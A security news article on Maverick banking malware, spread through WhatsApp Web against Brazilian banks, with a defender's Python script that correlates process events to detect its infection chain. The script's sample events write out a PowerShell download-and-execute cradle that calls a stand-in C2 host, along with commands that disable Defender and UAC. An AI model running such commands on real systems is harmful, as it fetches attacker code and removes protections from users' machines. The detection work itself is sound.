
Maverick Malware Hijacks WhatsApp Web to Target Brazilian Banks

Threat hunters have uncovered similarities between Coyote banking malware and a newly disclosed malicious program called Maverick. Both strains are written in .NET, target Brazilian users and banks, and share identical functionality to decrypt banking URLs and monitor banking applications. More importantly, both include the ability to spread through WhatsApp Web.


The Maverick Attack Chain

Maverick was first documented by Trend Micro, which attributed it to the threat actor Water Saci. The campaign uses two components. A self-propagating malware, SORVEPOTEL, spreads via the desktop web version of WhatsApp and delivers a ZIP archive containing the Maverick payload.

Maverick monitors active browser tabs for URLs matching a hard-coded list of Latin American financial institutions. If a match occurs, it contacts a remote server to gather system information and serve phishing pages that steal credentials.

Code Links and Evolution

Cybersecurity firm Sophos first raised the possibility that this activity was related to prior Coyote campaigns. Subsequent analysis from Kaspersky and CyberProof confirmed that Maverick shares many code overlaps with Coyote.

CyberProof's findings show that the ZIP file contains a Windows shortcut (LNK) that executes PowerShell. This script connects to an external server to download the first-stage payload. Intermediate tools are deployed to disable Microsoft Defender Antivirus and UAC, and then retrieve a .NET loader. This loader features anti-analysis techniques and only installs Maverick if the victim is confirmed to be in Brazil by checking time zone and language settings. CyberProof also found evidence of the malware targeting Brazilian hotels, suggesting an expansion of the victim set.
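A defender-side correlation of the chain CyberProof describes (LNK-launched PowerShell that downloads a stage, followed by Defender/UAC tampering from its child processes), written here as an added example rather than code from the article or any vendor. The event schema, the tampering and download patterns, and the sample process-creation events are assumptions constructed for illustration.

```python
# Added example: correlate process-creation events into the chain described above
# (explorer-launched PowerShell download cradle -> descendant Defender/UAC tampering).
import re

# Constructed sample events (assumed schema; pids are arbitrary, not from the article).
EVENTS = [
    {"ts": 1, "host": "ws1", "pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"ts": 2, "host": "ws1", "pid": 200, "ppid": 100, "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/s1')"},
    {"ts": 3, "host": "ws1", "pid": 300, "ppid": 200, "image": "powershell.exe",
     "cmdline": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"ts": 4, "host": "ws1", "pid": 301, "ppid": 200, "image": "reg.exe",
     "cmdline": r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    # Admin host: same tampering command, but typed at a console with no download stage -> no alert.
    {"ts": 5, "host": "admin1", "pid": 500, "ppid": 1, "image": "cmd.exe", "cmdline": "cmd.exe"},
    {"ts": 6, "host": "admin1", "pid": 501, "ppid": 500, "image": "powershell.exe",
     "cmdline": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
]

DOWNLOAD = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I)
TAMPER = re.compile(r"Set-MpPreference.*-Disable|EnableLUA.*\b0\b", re.I)

def is_download_cradle(ev, by_pid):
    """Stage 1: powershell.exe spawned by explorer.exe (how a double-clicked LNK runs) with a download primitive."""
    parent = by_pid.get((ev["host"], ev["ppid"]))
    return (ev["image"].lower() == "powershell.exe" and parent is not None
            and parent["image"].lower() == "explorer.exe"
            and DOWNLOAD.search(ev["cmdline"]) is not None)

def descends_from(ev, root_pid, by_pid):
    """Walk ppid links upward; True if root_pid is an ancestor of ev (cycle-safe)."""
    seen, cur = set(), ev
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        if cur["ppid"] == root_pid:
            return True
        cur = by_pid.get((cur["host"], cur["ppid"]))
    return False

def detect_chains(events):
    """Return one hit per download cradle that later has a tampering descendant on the same host."""
    by_pid = {(e["host"], e["pid"]): e for e in events}
    hits = []
    for s1 in events:
        if not is_download_cradle(s1, by_pid):
            continue
        tampers = [e["pid"] for e in events if e["host"] == s1["host"] and e["ts"] > s1["ts"]
                   and TAMPER.search(e["cmdline"]) and descends_from(e, s1["pid"], by_pid)]
        if tampers:
            hits.append({"host": s1["host"], "stage1_pid": s1["pid"], "tamper_pids": tampers})
    return hits
```

Requiring the tampering process to descend from an explorer-spawned download cradle is what keeps the legitimate admin session on `admin1` from alerting; on real telemetry the same logic runs over Sysmon or EDR process events mapped to this schema.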

Water Saci's New Tactics

Trend Micro detailed a newer Water Saci attack chain that relies on an email-based command-and-control (C2) infrastructure and uses multi-vector persistence. This new chain avoids .NET binaries, favoring Visual Basic Script and PowerShell to hijack WhatsApp browser sessions.

The malware uses downloaded tools like ChromeDriver to automate the browser and bypass authentication. It steals the victim’s legitimate Chrome profile data, including cookies and authentication tokens, to gain immediate access to the WhatsApp account without triggering security alerts.

This new SORVEPOTEL variant uses IMAP connections to a specific email provider for C2 commands, instead of traditional HTTP communication. It executes a wide array of commands, including running shell commands, taking screenshots, exfiltrating files, and deleting traces of its activity.

The widespread nature of the campaign is driven by WhatsApp's popularity in Brazil, which has over 148 million active users. Trend Micro concluded that the ongoing tactical evolution and region-focused targeting indicate that Water Saci is likely linked to Coyote, signaling a significant shift toward exploiting messaging platforms for scalable attacks.
